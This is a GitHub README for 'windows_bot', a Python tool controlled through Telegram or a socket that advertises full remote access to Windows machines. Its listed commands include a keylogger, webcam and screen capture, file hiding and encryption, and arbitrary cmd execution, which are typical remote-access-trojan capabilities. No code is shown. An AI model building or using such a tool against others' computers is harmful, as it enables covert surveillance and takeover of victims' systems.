Skip to content

cppandpython/windows_bot

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

21 Commits
 
 
 
 
 
 
 
 

Repository files navigation

There will be a huge update



🌟 Windows Bot



Core Commands
=============

    Command                   Description
    -------                   -----------   
    author                    Information about creator of this project                                         
    help                      Help menu
    module                    Module control
    session                   About this session
    accounts                  Control accounts connected to this computer session 
    getuid                    Get the user on whose behalf the bot is running
    getpid                    Get the current process identifier
    exit                      Log out of this computer session
                                                              

File System Commands 
====================

    Command                   Description
    -------                   -----------                                                                                                                                                        
    pwd                       Display working directory
    cd                        Change directory
    ls                        List files in working directory  
    hide                      Hide folder or file
    unhide                    Unhide folder or file                               
    mkdir                     Create folder
    mkfile                    Create file
    rn                        Rename folder or file
    rmdir                     Delete folder            
    rm                        Delete file  
    cp                        Copy folder or file to destination
    mv                        Move folder or file to destination
    download                  Download file
    upload                    Upload file
    encrypt                   Encrypt file
    decrypt                   Decrypt file

                                                              
Networking Commands
===================

    Command                   Description
    -------                   -----------         
    netsh                     Network parameters control
    network                   Network control
    ipconfig                  Get network interfaces
    route                     Get routing table
    arp                       Get host ARP cache                                                                                     
    netstat                   Get network connections
    site                      Website control  
                                                                                               
                                               
System Commands                                                    
===============

    Command                   Description
    -------                   -----------                                                                                                           
    device                    Device control 
    buffer                    Get data from buffer
    systeminfo                Get information about computer
    services                  Get information about services
    tasks                     Get information about tasks
    startup                   Get information about startup
    paths                     Get paths to all folders on computer
    app                       Application control   
    ps                        List running processes
    kill                      Terminate process
    reg                       Registry control
    sc                        Services control
    schtasks                  Task scheduler control
    secedit                   Group policy editor control                     
    wmic                      Control windows with wmic 
    winmgmt                   Wmic tool support              
    user                      User account control on this computer
    time                      Get current time or change current time
    date                      Get current date or change current date
    cmd                       Execute command in cmd
    reboot                    Computer reboot
    shutdown                  Computer shutdown

                                                                                                            
User Interface Commands                                                  
=======================

    Command                   Description
    -------                   -----------
    screenshot                Take screenshot of desktop
    screenshot_webcam         Take screenshot using webcam 
    play                      Record audio or video from screen or video from webcam
    mouse                     Mouse control 
    keyboard                  Keyboard control                                                                                                                                         
    keylogger                 Control collected keylogger data
    show                      Display message



en


Bot — Provide full remote access to the system


🚀 Features

  • ✅ Ease of use
  • ⚙️ Extensive functionality
  • 📦 Can be compiled into .exe

🧰 Installation

# Clone the repository
git clone https://github.com/cppandpython/windows_bot.git

# Edit in bot_telegram.py or bot_socket.py
if bot_telegram.py
    TOKEN = 'YOUR TELEGRAM BOT TOKEN'
PATH = 'YOUR BOT PATH'
PASSWORD = 'YOUR PASSWORD'

# Launch
python bot.py




ru


bot — Обеспечивает полный удаленный доступ к системе


🚀 Функции

  • ✅ Простота использования
  • ⚙️ Большая функциональность
  • 📦 Можно скомпилировать в .exe

🧰 Установка

# Клонируй репозиторий
git clone https://github.com/cppandpython/windows_bot.git

# Изменить в bot_telegram.py или bot_socket.py
if bot_telegram.py
    TOKEN = 'ВАШ ТЕЛЕГРАМ ТОКЕН БОТА'
PATH = 'ВАШ ПУТЬ ДЛЯ БОТА'
PASSWORD = 'ВАШ ПАРОЛЬ'

# Запуск
python bot.py

About

Full remote access to Windows

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages